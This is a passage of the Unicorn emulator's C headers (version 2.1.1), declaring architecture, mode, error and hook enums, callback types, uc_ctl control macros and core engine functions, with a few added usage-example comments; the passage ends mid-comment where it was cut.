    UC_TRICORE_REG_SP = UC_TRICORE_REG_A10,
    UC_TRICORE_REG_LR = UC_TRICORE_REG_A11,
    UC_TRICORE_REG_IA = UC_TRICORE_REG_A15,
    UC_TRICORE_REG_ID = UC_TRICORE_REG_D15,
} uc_tricore_reg;

#ifdef __cplusplus
}
#endif

#endif
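/* Illustrative sketch (not part of this header): the aliases above map ABI
   names onto the raw register IDs, e.g. the stack pointer is address
   register A10:

       uint32_t sp = 0xd0001000; // hypothetical stack top
       uc_reg_write(uc, UC_TRICORE_REG_SP, &sp); // same as UC_TRICORE_REG_A10
*/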
unicorn-2.1.1/include/unicorn/unicorn.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_ENGINE_H
#define UNICORN_ENGINE_H

#ifdef __cplusplus
extern "C" {
#endif

#include "platform.h"
#include <stdarg.h>

#if defined(UNICORN_HAS_OSXKERNEL)
#include <libkern/libkern.h>
#else
#include <stdlib.h>
#include <stdio.h>
#endif

struct uc_struct;
typedef struct uc_struct uc_engine;

typedef size_t uc_hook;

#include "m68k.h"
#include "x86.h"
#include "arm.h"
#include "arm64.h"
#include "mips.h"
#include "sparc.h"
#include "ppc.h"
#include "riscv.h"
#include "s390x.h"
#include "tricore.h"

#ifdef __GNUC__
#define DEFAULT_VISIBILITY __attribute__((visibility("default")))
#else
#define DEFAULT_VISIBILITY
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#pragma warning(disable : 4100)

#ifdef UNICORN_SHARED
#define UNICORN_EXPORT __declspec(dllexport)
#else // defined(UNICORN_STATIC)
#define UNICORN_EXPORT
#endif
#else
#ifdef __GNUC__
#define UNICORN_EXPORT __attribute__((visibility("default")))
#else
#define UNICORN_EXPORT
#endif
#endif

#ifdef __GNUC__
#define UNICORN_DEPRECATED __attribute__((deprecated))
#elif defined(_MSC_VER)
#define UNICORN_DEPRECATED __declspec(deprecated)
#else
#pragma message(                                                               \
    "WARNING: You need to implement UNICORN_DEPRECATED for this compiler")
#define UNICORN_DEPRECATED
#endif

// Unicorn API version
#define UC_API_MAJOR 2
#define UC_API_MINOR 1
#define UC_API_PATCH 1
// Release candidate version, 255 means the official release.
#define UC_API_EXTRA 255

// Unicorn package version
#define UC_VERSION_MAJOR UC_API_MAJOR
#define UC_VERSION_MINOR UC_API_MINOR
#define UC_VERSION_PATCH UC_API_PATCH
#define UC_VERSION_EXTRA UC_API_EXTRA
/*
 Macro to create a combined version which can be compared to the
 result of the uc_version() API.
*/
#define UC_MAKE_VERSION(major, minor) (((major) << 24) + ((minor) << 16))

// Scales to calculate timeout on microsecond unit
// 1 second = 1,000,000 microseconds
#define UC_SECOND_SCALE 1000000
// 1 millisecond = 1,000 microseconds
#define UC_MILISECOND_SCALE 1000

// Architecture type
typedef enum uc_arch {
    UC_ARCH_ARM = 1, // ARM architecture (including Thumb, Thumb-2)
    UC_ARCH_ARM64,   // ARM-64, also called AArch64
    UC_ARCH_MIPS,    // Mips architecture
    UC_ARCH_X86,     // X86 architecture (including x86 & x86-64)
    UC_ARCH_PPC,     // PowerPC architecture
    UC_ARCH_SPARC,   // Sparc architecture
    UC_ARCH_M68K,    // M68K architecture
    UC_ARCH_RISCV,   // RISCV architecture
    UC_ARCH_S390X,   // S390X architecture
    UC_ARCH_TRICORE, // TriCore architecture
    UC_ARCH_MAX,
} uc_arch;

// Mode type
typedef enum uc_mode {
    UC_MODE_LITTLE_ENDIAN = 0,    // little-endian mode (default mode)
    UC_MODE_BIG_ENDIAN = 1 << 30, // big-endian mode

    // arm / arm64
    UC_MODE_ARM = 0,        // ARM mode
    UC_MODE_THUMB = 1 << 4, // THUMB mode (including Thumb-2)
    // Deprecated, use UC_ARM_CPU_* with uc_ctl instead.
    UC_MODE_MCLASS = 1 << 5,  // ARM's Cortex-M series.
    UC_MODE_V8 = 1 << 6,      // ARMv8 A32 encodings for ARM
    UC_MODE_ARMBE8 = 1 << 10, // Big-endian data and Little-endian code.
                              // Legacy support for UC1 only.

    // arm (32bit) cpu types
    // Deprecated, use UC_ARM_CPU_* with uc_ctl instead.
    UC_MODE_ARM926 = 1 << 7,  // ARM926 CPU type
    UC_MODE_ARM946 = 1 << 8,  // ARM946 CPU type
    UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU type

    // mips
    UC_MODE_MICRO = 1 << 4,    // MicroMips mode (currently unsupported)
    UC_MODE_MIPS3 = 1 << 5,    // Mips III ISA (currently unsupported)
    UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (currently unsupported)
    UC_MODE_MIPS32 = 1 << 2,   // Mips32 ISA
    UC_MODE_MIPS64 = 1 << 3,   // Mips64 ISA

    // x86 / x64
    UC_MODE_16 = 1 << 1, // 16-bit mode
    UC_MODE_32 = 1 << 2, // 32-bit mode
    UC_MODE_64 = 1 << 3, // 64-bit mode

    // ppc
    UC_MODE_PPC32 = 1 << 2, // 32-bit mode
    UC_MODE_PPC64 = 1 << 3, // 64-bit mode (currently unsupported)
    UC_MODE_QPX = 1 << 4,   // Quad Processing eXtensions mode
                            // (currently unsupported)

    // sparc
    UC_MODE_SPARC32 = 1 << 2, // 32-bit mode
    UC_MODE_SPARC64 = 1 << 3, // 64-bit mode
    UC_MODE_V9 = 1 << 4,      // SparcV9 mode (currently unsupported)

    // riscv
    UC_MODE_RISCV32 = 1 << 2, // 32-bit mode
    UC_MODE_RISCV64 = 1 << 3, // 64-bit mode

    // m68k
} uc_mode;
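/* Illustrative sketch (not part of this header): a minimum-version check at
   startup, using UC_MAKE_VERSION against uc_version() (declared further
   below). The low bits of the returned value carry patch/extra, so a >=
   comparison is the practical idiom:

       if (uc_version(NULL, NULL) < UC_MAKE_VERSION(2, 1)) {
           // the loaded library is older than these headers expect
       }
*/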
// All types of errors encountered by the Unicorn API.
// These are values returned by uc_errno()
typedef enum uc_err {
    UC_ERR_OK = 0,   // No error: everything was fine
    UC_ERR_NOMEM,    // Out-Of-Memory error: uc_open(), uc_emulate()
    UC_ERR_ARCH,     // Unsupported architecture: uc_open()
    UC_ERR_HANDLE,   // Invalid handle
    UC_ERR_MODE,     // Invalid/unsupported mode: uc_open()
    UC_ERR_VERSION,  // Unsupported version (bindings)
    UC_ERR_READ_UNMAPPED,  // Quit emulation due to READ on unmapped memory:
                           // uc_emu_start()
    UC_ERR_WRITE_UNMAPPED, // Quit emulation due to WRITE on unmapped memory:
                           // uc_emu_start()
    UC_ERR_FETCH_UNMAPPED, // Quit emulation due to FETCH on unmapped memory:
                           // uc_emu_start()
    UC_ERR_HOOK,           // Invalid hook type: uc_hook_add()
    UC_ERR_INSN_INVALID,   // Quit emulation due to invalid instruction:
                           // uc_emu_start()
    UC_ERR_MAP,            // Invalid memory mapping: uc_mem_map()
    UC_ERR_WRITE_PROT,     // Quit emulation due to UC_MEM_WRITE_PROT violation:
                           // uc_emu_start()
    UC_ERR_READ_PROT,      // Quit emulation due to UC_MEM_READ_PROT violation:
                           // uc_emu_start()
    UC_ERR_FETCH_PROT,     // Quit emulation due to UC_MEM_FETCH_PROT violation:
                           // uc_emu_start()
    UC_ERR_ARG, // Invalid argument provided to uc_xxx function (See specific
                // function API)
    UC_ERR_READ_UNALIGNED,  // Unaligned read
    UC_ERR_WRITE_UNALIGNED, // Unaligned write
    UC_ERR_FETCH_UNALIGNED, // Unaligned fetch
    UC_ERR_HOOK_EXIST,      // hook for this event already existed
    UC_ERR_RESOURCE,        // Insufficient resource: uc_emu_start()
    UC_ERR_EXCEPTION,       // Unhandled CPU exception
    UC_ERR_OVERFLOW,        // Provided buffer is not large enough: uc_reg_*2()
} uc_err;

/*
 Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK)

 @address: address where the code is being executed
 @size: size of machine instruction(s) being executed, or 0 when size is
   unknown
 @user_data: user data passed to tracing APIs.
*/
typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address,
                                 uint32_t size, void *user_data);

/*
 Callback function for tracing interrupts (for uc_hook_intr())

 @intno: interrupt number
 @user_data: user data passed to tracing APIs.
*/
typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno,
                                 void *user_data);

/*
 Callback function for tracing invalid instructions

 @user_data: user data passed to tracing APIs.

 @return: return true to continue, or false to stop program (due to invalid
   instruction).
*/
typedef bool (*uc_cb_hookinsn_invalid_t)(uc_engine *uc, void *user_data);
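/* Illustrative sketch (not part of this header): a minimal callback matching
   uc_cb_hookcode_t, suitable for UC_HOOK_CODE; it just logs each instruction
   boundary. Assumes <stdio.h> and <inttypes.h> for PRIx64:

       static void trace_code(uc_engine *uc, uint64_t address, uint32_t size,
                              void *user_data)
       {
           printf(">>> executing %u byte(s) at 0x%" PRIx64 "\n", size,
                  address);
       }
*/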
/*
 Callback function for tracing IN instruction of X86

 @port: port number
 @size: data size (1/2/4) to be read from this port
 @user_data: user data passed to tracing APIs.
*/
typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size,
                                    void *user_data);

/*
 Callback function for OUT instruction of X86

 @port: port number
 @size: data size (1/2/4) to be written to this port
 @value: data value to be written to this port
*/
typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size,
                                 uint32_t value, void *user_data);

typedef struct uc_tlb_entry uc_tlb_entry;

// All types of memory accesses for UC_HOOK_MEM_*
typedef enum uc_mem_type {
    UC_MEM_READ = 16,      // Memory is read from
    UC_MEM_WRITE,          // Memory is written to
    UC_MEM_FETCH,          // Memory is fetched
    UC_MEM_READ_UNMAPPED,  // Unmapped memory is read from
    UC_MEM_WRITE_UNMAPPED, // Unmapped memory is written to
    UC_MEM_FETCH_UNMAPPED, // Unmapped memory is fetched
    UC_MEM_WRITE_PROT,     // Write to write protected, but mapped, memory
    UC_MEM_READ_PROT,      // Read from read protected, but mapped, memory
    UC_MEM_FETCH_PROT,     // Fetch from non-executable, but mapped, memory
    UC_MEM_READ_AFTER,     // Memory is read from (successful access)
} uc_mem_type;

/*
 Callback function for tlb lookups

 @vaddr: virtual address for lookup
 @rw: the access mode
 @result: result entry, contains physical address (paddr) and permitted
   access type (perms) for the entry

 @return: return true if the entry was found. If callbacks are present but
   none of them returns true, a page fault is generated.
*/
typedef bool (*uc_cb_tlbevent_t)(uc_engine *uc, uint64_t vaddr,
                                 uc_mem_type type, uc_tlb_entry *result,
                                 void *user_data);

// Represent a TranslationBlock.
typedef struct uc_tb {
    uint64_t pc;
    uint16_t icount;
    uint16_t size;
} uc_tb;

/*
 Callback function for new edges between translation blocks.

 @cur_tb: Current TB which is to be generated.
 @prev_tb: The previous TB.
*/
typedef void (*uc_hook_edge_gen_t)(uc_engine *uc, uc_tb *cur_tb,
                                   uc_tb *prev_tb, void *user_data);

/*
 Callback function for tcg opcodes that fit in two arguments.

 @address: Current pc.
 @arg1: The first argument.
 @arg2: The second argument.
*/
typedef void (*uc_hook_tcg_op_2)(uc_engine *uc, uint64_t address,
                                 uint64_t arg1, uint64_t arg2, uint32_t size,
                                 void *user_data);

typedef uc_hook_tcg_op_2 uc_hook_tcg_sub_t;

/*
 Callback function for MMIO read

 @offset: offset to the base address of the IO memory.
 @size: data size to read
 @user_data: user data passed to uc_mmio_map()
*/
typedef uint64_t (*uc_cb_mmio_read_t)(uc_engine *uc, uint64_t offset,
                                      unsigned size, void *user_data);

/*
 Callback function for MMIO write

 @offset: offset to the base address of the IO memory.
 @size: data size to write
 @value: data value to be written
 @user_data: user data passed to uc_mmio_map()
*/
typedef void (*uc_cb_mmio_write_t)(uc_engine *uc, uint64_t offset,
                                   unsigned size, uint64_t value,
                                   void *user_data);

// These are all op codes we support to hook for UC_HOOK_TCG_OP_CODE.
// Be cautious since it may bring much more overhead than UC_HOOK_CODE without
// proper flags.
// TODO: Tracing UC_TCG_OP_CALL should be interesting.
typedef enum uc_tcg_op_code {
    UC_TCG_OP_SUB = 0, // Both sub_i32 and sub_i64
} uc_tcg_op_code;

// These are extra flags to be paired with uc_tcg_op_code which is helpful to
// instrument in some certain cases.
typedef enum uc_tcg_op_flag {
    // Only instrument opcode if it would set cc_dst, i.e. cmp instruction.
    UC_TCG_OP_FLAG_CMP = 1 << 0,
    // Only instrument opcode which is directly translated.
    // i.e. x86 sub/subc -> tcg sub_i32/64
    UC_TCG_OP_FLAG_DIRECT = 1 << 1
} uc_tcg_op_flag;
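/* Illustrative sketch (not part of this header): a matching pair of handlers
   for uc_mmio_map() (declared further below). The device modelled here is
   hypothetical:

       static uint64_t dev_read(uc_engine *uc, uint64_t offset, unsigned size,
                                void *user_data)
       {
           return 0xff; // e.g. a status register that always reads "ready"
       }

       static void dev_write(uc_engine *uc, uint64_t offset, unsigned size,
                             uint64_t value, void *user_data)
       {
           // latch the value, raise an interrupt, etc.
       }
*/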
// All types of hooks for the uc_hook_add() API.
typedef enum uc_hook_type {
    // Hook all interrupt/syscall events
    UC_HOOK_INTR = 1 << 0,
    // Hook a particular instruction - only a very small subset of instructions
    // supported here
    UC_HOOK_INSN = 1 << 1,
    // Hook a range of code
    UC_HOOK_CODE = 1 << 2,
    // Hook basic blocks
    UC_HOOK_BLOCK = 1 << 3,
    // Hook for memory read on unmapped memory
    UC_HOOK_MEM_READ_UNMAPPED = 1 << 4,
    // Hook for invalid memory write events
    UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5,
    // Hook for invalid memory fetch for execution events
    UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6,
    // Hook for memory read on read-protected memory
    UC_HOOK_MEM_READ_PROT = 1 << 7,
    // Hook for memory write on write-protected memory
    UC_HOOK_MEM_WRITE_PROT = 1 << 8,
    // Hook for memory fetch on non-executable memory
    UC_HOOK_MEM_FETCH_PROT = 1 << 9,
    // Hook memory read events.
    UC_HOOK_MEM_READ = 1 << 10,
    // Hook memory write events.
    UC_HOOK_MEM_WRITE = 1 << 11,
    // Hook memory fetch for execution events
    UC_HOOK_MEM_FETCH = 1 << 12,
    // Hook memory read events, but only successful access.
    // The callback will be triggered after successful read.
    UC_HOOK_MEM_READ_AFTER = 1 << 13,
    // Hook invalid instructions exceptions.
    UC_HOOK_INSN_INVALID = 1 << 14,
    // Hook on new edge generation. Could be useful in program analysis.
    //
    // NOTE: This is different from UC_HOOK_BLOCK in 2 ways:
    //       1. The hook is called before executing code.
    //       2. The hook is only called when generation is triggered.
    UC_HOOK_EDGE_GENERATED = 1 << 15,
    // Hook on specific tcg op code. The usage of this hook is similar to
    // UC_HOOK_INSN.
    UC_HOOK_TCG_OPCODE = 1 << 16,
    // Hook on tlb fill requests.
    // Register a tlb fill request hook on virtual addresses.
    // The callback will be triggered if the tlb cache does not contain the
    // address.
    UC_HOOK_TLB_FILL = 1 << 17,
} uc_hook_type;

// Hook type for all events of unmapped memory access
#define UC_HOOK_MEM_UNMAPPED                                                   \
    (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED +                  \
     UC_HOOK_MEM_FETCH_UNMAPPED)
// Hook type for all events of illegal protected memory access
#define UC_HOOK_MEM_PROT                                                       \
    (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT)
// Hook type for all events of illegal read memory access
#define UC_HOOK_MEM_READ_INVALID                                               \
    (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED)
// Hook type for all events of illegal write memory access
#define UC_HOOK_MEM_WRITE_INVALID                                              \
    (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED)
// Hook type for all events of illegal fetch memory access
#define UC_HOOK_MEM_FETCH_INVALID                                              \
    (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED)
// Hook type for all events of illegal memory access
#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT)
// Hook type for all events of valid memory access
// NOTE: UC_HOOK_MEM_READ is triggered before UC_HOOK_MEM_READ_PROT and
//       UC_HOOK_MEM_READ_UNMAPPED, so this hook may technically trigger on
//       some invalid reads.
#define UC_HOOK_MEM_VALID                                                      \
    (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH)
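/* Illustrative sketch (not part of this header): the composite masks above
   can be passed directly to uc_hook_add() (declared further below) to cover
   several events at once. on_unmapped is a hypothetical uc_cb_eventmem_t
   handler (see the sketch after that typedef):

       uc_hook hh;
       uc_hook_add(uc, &hh, UC_HOOK_MEM_UNMAPPED, (void *)on_unmapped, NULL,
                   1, 0); // begin > end: the hook fires everywhere
*/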
/*
 Callback function for hooking memory (READ, WRITE & FETCH)

 @type: this memory is being READ, or WRITE
 @address: address where memory is being written or read to
 @size: size of data being read or written
 @value: value of data being written to memory, or irrelevant if type = READ.
 @user_data: user data passed to tracing APIs
*/
typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type,
                                uint64_t address, int size, int64_t value,
                                void *user_data);

/*
 Callback function for handling invalid memory access events (UNMAPPED and
   PROT events)

 @type: this memory is being READ, or WRITE
 @address: address where memory is being written or read to
 @size: size of data being read or written
 @value: value of data being written to memory, or irrelevant if type = READ.
 @user_data: user data passed to tracing APIs

 @return: return true to continue, or false to stop program (due to invalid
   memory).
   NOTE: returning true to continue execution will only work if the accessed
   memory is made accessible with the correct permissions during the hook.

   In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback,
   the memory should be uc_mem_map()-ed with the correct permissions, and the
   instruction will then read or write to the address as it was supposed to.

   In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped
   in as executable, in which case execution will resume from the fetched
   address. The instruction pointer may be written to in order to change where
   execution resumes, but the fetch must succeed if execution is to resume.
*/
typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type,
                                 uint64_t address, int size, int64_t value,
                                 void *user_data);

/*
 Memory region mapped by uc_mem_map() and uc_mem_map_ptr()
 Retrieve the list of memory regions with uc_mem_regions()
*/
typedef struct uc_mem_region {
    uint64_t begin; // begin address of the region (inclusive)
    uint64_t end;   // end address of the region (inclusive)
    uint32_t perms; // memory permissions of the region
} uc_mem_region;

// All types of queries for the uc_query() API.
typedef enum uc_query_type {
    // Dynamically query current hardware mode.
    UC_QUERY_MODE = 1,
    UC_QUERY_PAGE_SIZE, // query pagesize of engine
    UC_QUERY_ARCH, // query architecture of engine (for ARM to query Thumb
                   // mode)
    UC_QUERY_TIMEOUT, // query if emulation stops due to timeout (indicated if
                      // result = True)
} uc_query_type;

// The implementation of uc_ctl is like what Linux ioctl does but slightly
// different.
//
// A uc_control_type passed to uc_ctl is constructed as:
//
//    R/W       NR       Reserved     Type
//  [      ] [      ]  [         ] [       ]
//  31    30 29     26 25       16 15      0
//
// @R/W: Whether the operation is a read or write access.
// @NR: Number of arguments.
// @Reserved: Should be zero, reserved for future extension.
// @Type: Taken from uc_control_type enum.
//
// See the helper macros below.

// No input and output arguments.
#define UC_CTL_IO_NONE (0)
// Only input arguments for a write operation.
#define UC_CTL_IO_WRITE (1)
// Only output arguments for a read operation.
#define UC_CTL_IO_READ (2)
// The arguments include both input and output arguments.
#define UC_CTL_IO_READ_WRITE (UC_CTL_IO_WRITE | UC_CTL_IO_READ)

#define UC_CTL(type, nr, rw)                                                   \
    (uc_control_type)((type) | ((nr) << 26) | ((rw) << 30))
#define UC_CTL_NONE(type, nr) UC_CTL(type, nr, UC_CTL_IO_NONE)
#define UC_CTL_READ(type, nr) UC_CTL(type, nr, UC_CTL_IO_READ)
#define UC_CTL_WRITE(type, nr) UC_CTL(type, nr, UC_CTL_IO_WRITE)
#define UC_CTL_READ_WRITE(type, nr) UC_CTL(type, nr, UC_CTL_IO_READ_WRITE)
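/* Illustrative sketch (not part of this header): a uc_cb_eventmem_t handler
   that demand-maps a page so the faulting access can be retried, per the
   NOTE in the typedef's comment above:

       static bool on_unmapped(uc_engine *uc, uc_mem_type type,
                               uint64_t address, int size, int64_t value,
                               void *user_data)
       {
           // map the enclosing 4KB page with full permissions
           uc_mem_map(uc, address & ~0xfffULL, 0x1000, UC_PROT_ALL);
           return true; // retry the access
       }
*/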
// unicorn tlb type selection
typedef enum uc_tlb_type {
    // The default unicorn virtual TLB implementation:
    // the TLB implementation of the CPU, best to use for full system
    // emulation.
    UC_TLB_CPU = 0,
    // This tlb defaults to virtual address == physical address.
    // A hook is also available to override the tlb entries (see
    // uc_cb_tlbevent_t).
    UC_TLB_VIRTUAL
} uc_tlb_type;

// All types of controls for the uc_ctl API.
// The controls are organized in a tree level.
// If a control doesn't have `Set` or `Get` for @args, it means it's r/o or
// w/o.
typedef enum uc_control_type {
    // Current mode.
    // Read: @args = (int*)
    UC_CTL_UC_MODE = 0,
    // Current page size.
    // Write: @args = (uint32_t)
    // Read: @args = (uint32_t*)
    UC_CTL_UC_PAGE_SIZE,
    // Current arch.
    // Read: @args = (int*)
    UC_CTL_UC_ARCH,
    // Current timeout.
    // Read: @args = (uint64_t*)
    UC_CTL_UC_TIMEOUT,
    // Enable multiple exits.
    // Without this control, reading/setting exits won't work.
    // This is for API backward compatibility.
    // Write: @args = (int)
    UC_CTL_UC_USE_EXITS,
    // The number of current exits.
    // Read: @args = (size_t*)
    UC_CTL_UC_EXITS_CNT,
    // Current exits.
    // Write: @args = (uint64_t* exits, size_t len)
    //        @len = UC_CTL_UC_EXITS_CNT
    // Read: @args = (uint64_t* exits, size_t len)
    //       @len = UC_CTL_UC_EXITS_CNT
    UC_CTL_UC_EXITS,
    // Set the cpu model of uc.
    // Note this option can only be set before any Unicorn
    // API is called except for uc_open.
    // Write: @args = (int)
    // Read: @args = (int*)
    UC_CTL_CPU_MODEL,
    // Request a tb cache at a specific address
    // Read: @args = (uint64_t, uc_tb*)
    UC_CTL_TB_REQUEST_CACHE,
    // Invalidate a tb cache at a specific address
    // Write: @args = (uint64_t, uint64_t)
    UC_CTL_TB_REMOVE_CACHE,
    // Invalidate all translation blocks.
    // No arguments.
    UC_CTL_TB_FLUSH,
    // Invalidate all TLB cache entries and translation blocks.
    // No arguments
    UC_CTL_TLB_FLUSH,
    // Change the tlb implementation
    // see uc_tlb_type for currently implemented types
    // Write: @args = (int)
    UC_CTL_TLB_TYPE,
    // Change the tcg translation buffer size, note that
    // unicorn may adjust this value.
    // Write: @args = (uint32_t)
    // Read: @args = (uint32_t*)
    UC_CTL_TCG_BUFFER_SIZE,
    // control whether context_save/restore should work with snapshots
    // Write: @args = (int)
    UC_CTL_CONTEXT_MODE,
} uc_control_type;

/*
 Exits Mechanism

 In some cases, users may have multiple exits and the @until parameter of
 uc_emu_start is not sufficient to control the emulation. The exits mechanism
 is designed to solve this problem.

 Note that using hooks is also feasible, but the exits could be slightly more
 efficient and easier to implement.

 By default, the exits mechanism is disabled to keep backward compatibility.
 That is to say, calling uc_ctl_set/get_exits would return an error.

 Thus, to enable the exits firstly, call:

   uc_ctl_exits_enable(uc)

 After this call, the @until parameter of uc_emu_start would have no effect on
 the emulation, so:

   uc_emu_start(uc, 0x1000, 0 ...)
   uc_emu_start(uc, 0x1000, 0x1000 ...)
   uc_emu_start(uc, 0x1000, -1 ...)

 The three calls are totally equivalent since the @until is ignored.

 To setup the exits, users may call:

   uc_ctl_set/get_exits(uc, exits, len)

 For example, with an exits array [0x1000, 0x2000], uc_emu_start would stop at
 either 0x1000 or 0x2000. With an exits array [], uc_emu_start won't stop
 unless some hooks request a stop.

 If users would like to restore the default behavior of the @until parameter,
 users may call:

   uc_ctl_exits_disable(uc)

 After that, all exits setup previously would be cleared and the @until
 parameter would take effect again.

 See sample_ctl.c for a detailed example.
*/
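/* Illustrative sketch of the exits mechanism described above, using the
   helper macros defined right below. `base` is an assumed, already-mapped
   start address:

       uint64_t exits[] = {0x1000, 0x2000};
       uc_ctl_exits_enable(uc);
       uc_ctl_set_exits(uc, exits, 2);
       uc_emu_start(uc, base, 0, 0, 0); // @until ignored; stops at an exit
*/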
#define uc_ctl_get_mode(uc, mode)                                              \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_MODE, 1), (mode))
#define uc_ctl_get_page_size(uc, ptr)                                          \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_PAGE_SIZE, 1), (ptr))
#define uc_ctl_set_page_size(uc, page_size)                                    \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_PAGE_SIZE, 1), (page_size))
#define uc_ctl_get_arch(uc, arch)                                              \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_ARCH, 1), (arch))
#define uc_ctl_get_timeout(uc, ptr)                                            \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_TIMEOUT, 1), (ptr))
#define uc_ctl_exits_enable(uc)                                                \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_USE_EXITS, 1), 1)
#define uc_ctl_exits_disable(uc)                                               \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_USE_EXITS, 1), 0)
#define uc_ctl_get_exits_cnt(uc, ptr)                                          \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_EXITS_CNT, 1), (ptr))
#define uc_ctl_get_exits(uc, buffer, len)                                      \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_EXITS, 2), (buffer), (len))
#define uc_ctl_set_exits(uc, buffer, len)                                      \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_EXITS, 2), (buffer), (len))
#define uc_ctl_get_cpu_model(uc, model)                                        \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_CPU_MODEL, 1), (model))
#define uc_ctl_set_cpu_model(uc, model)                                        \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_CPU_MODEL, 1), (model))
#define uc_ctl_remove_cache(uc, address, end)                                  \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TB_REMOVE_CACHE, 2), (address), (end))
#define uc_ctl_request_cache(uc, address, tb)                                  \
    uc_ctl(uc, UC_CTL_READ_WRITE(UC_CTL_TB_REQUEST_CACHE, 2), (address), (tb))
#define uc_ctl_flush_tb(uc) uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TB_FLUSH, 0))
#define uc_ctl_flush_tlb(uc) uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TLB_FLUSH, 0))
#define uc_ctl_tlb_mode(uc, mode)                                              \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TLB_TYPE, 1), (mode))
#define uc_ctl_get_tcg_buffer_size(uc, size)                                   \
    uc_ctl(uc, UC_CTL_READ(UC_CTL_TCG_BUFFER_SIZE, 1), (size))
#define uc_ctl_set_tcg_buffer_size(uc, size)                                   \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TCG_BUFFER_SIZE, 1), (size))
#define uc_ctl_context_mode(uc, mode)                                          \
    uc_ctl(uc, UC_CTL_WRITE(UC_CTL_CONTEXT_MODE, 1), (mode))

// Opaque storage for CPU context, used with uc_context_*()
struct uc_context;
typedef struct uc_context uc_context;

/*
 Return combined API version & major and minor version numbers.

 @major: major number of API version
 @minor: minor number of API version

 @return hexadecimal number as (major << 24 | minor << 16 | patch << 8 |
   extra). NOTE: This returned value can be compared with a version number
   made with the macro UC_MAKE_VERSION.

 For example, Unicorn version 2.0.1 final would be 0x020001ff.

 NOTE: if you only care about the returned value, but not major and minor
   values, set both @major & @minor arguments to NULL.
*/
UNICORN_EXPORT
unsigned int uc_version(unsigned int *major, unsigned int *minor);

/*
 Determine if the given architecture is supported by this library.

 @arch: architecture type (UC_ARCH_*)

 @return True if this library supports the given arch.
*/
UNICORN_EXPORT
bool uc_arch_supported(uc_arch arch);

/*
 Create a new instance of unicorn engine.

 @arch: architecture type (UC_ARCH_*)
 @mode: hardware mode. This is combined of UC_MODE_*
 @uc: pointer to uc_engine, which will be updated at return time

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc);
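/* Illustrative sketch of the engine lifecycle around uc_open()/uc_close()
   (uc_close() and uc_strerror() are declared just below):

       uc_engine *uc;
       uc_err err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc);
       if (err != UC_ERR_OK) {
           printf("uc_open failed: %s\n", uc_strerror(err));
           return;
       }
       // ... map memory, add hooks, emulate ...
       uc_close(uc);
*/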
/*
 Close a Unicorn engine instance.
 NOTE: this must be called only when there is no longer any
   usage of @uc. This API releases some of @uc's cached memory, thus
   any use of the Unicorn API with @uc after it has been closed may
   crash your application. After this, @uc is invalid, and is no longer
   usable.

 @uc: pointer to a handle returned by uc_open()

 @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
   for detailed error).
*/
UNICORN_EXPORT
uc_err uc_close(uc_engine *uc);

/*
 Query internal status of engine.

 @uc: handle returned by uc_open()
 @type: query type. See uc_query_type
 @result: save the internal status queried

 @return: error code of uc_err enum type (UC_ERR_*, see above)
*/
UNICORN_EXPORT
uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result);

/*
 Control internal states of engine.

 Also see uc_ctl_* macro helpers for easy use.

 @uc: handle returned by uc_open()
 @control: the control type.
 @args: See uc_control_type for details about variadic arguments.

 @return: error code of uc_err enum type (UC_ERR_*, see above)
*/
UNICORN_EXPORT
uc_err uc_ctl(uc_engine *uc, uc_control_type control, ...);

/*
 Report the last error number when some API function fails.
 Like glibc's errno, uc_errno might not retain its old value once accessed.

 @uc: handle returned by uc_open()

 @return: error code of uc_err enum type (UC_ERR_*, see above)
*/
UNICORN_EXPORT
uc_err uc_errno(uc_engine *uc);

/*
